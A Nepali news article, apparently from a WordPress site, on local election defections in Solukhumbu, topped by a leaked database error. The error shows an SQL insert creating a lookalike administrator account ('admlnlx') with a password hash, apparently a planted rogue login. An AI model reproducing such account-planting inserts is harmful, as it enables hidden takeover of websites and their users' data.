WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZMup6P7.4IJ6icEacYAcl9mvCGIo61', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 02:18:50', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । नेपाली कांग्रेसकी नेतृ शारदा माया तामाङ नेकपा माओवादी केन्द्र प्रवेश गरेकी छिन् । २०७४ को निर्वाचनमा सोलुदुधकुण्ड नगरपालिका ४ बाट वडासदस्यमा निर्वाचित उनी कार्यपालिका सदस्य हुँदै नगर प्रवक्ताको भूमिकामा थिइन् ।
बैशाख ३० मा हुने स्थानीय तहको निर्वाचनमा मेयरको उम्मेदवारमा ङिमा तेण्डुप शेर्पालाई अघि सारिएको छ । निर्वाचनको संघारमा माओवादी प्रवेश गरेकी तामाङलाई माओवादीले सोलुदुधकुण्ड नरपालिकाको उपमेयरको उम्मेदवार बनाउने भएको छ । उनिलाई आज विहान सल्लेरीमा आयोजित एक कार्यक्रममा माओवादी केन्द्रका नेताहरुले स्वागत गरेका छन् ।
निर्वाचनको संघारमा सोलुखुम्बुको राजनीतिमा उथलपुथल देखिएको छ । शनिबार एमालेका प्रदेश कमिटी सदस्य तथा २०७४ को निर्वाचनमा सोलुदुधकुण्ड नगरपालिकाकी उपमेयर बनेकी कल्पना राईलगायतले पार्टी परित्यागको घोषणा गरेका छन् । स्रोतका अनुसार राईलाई नेपाली कांग्रेस प्रवेश गराउने तयारी गरिएको छ ।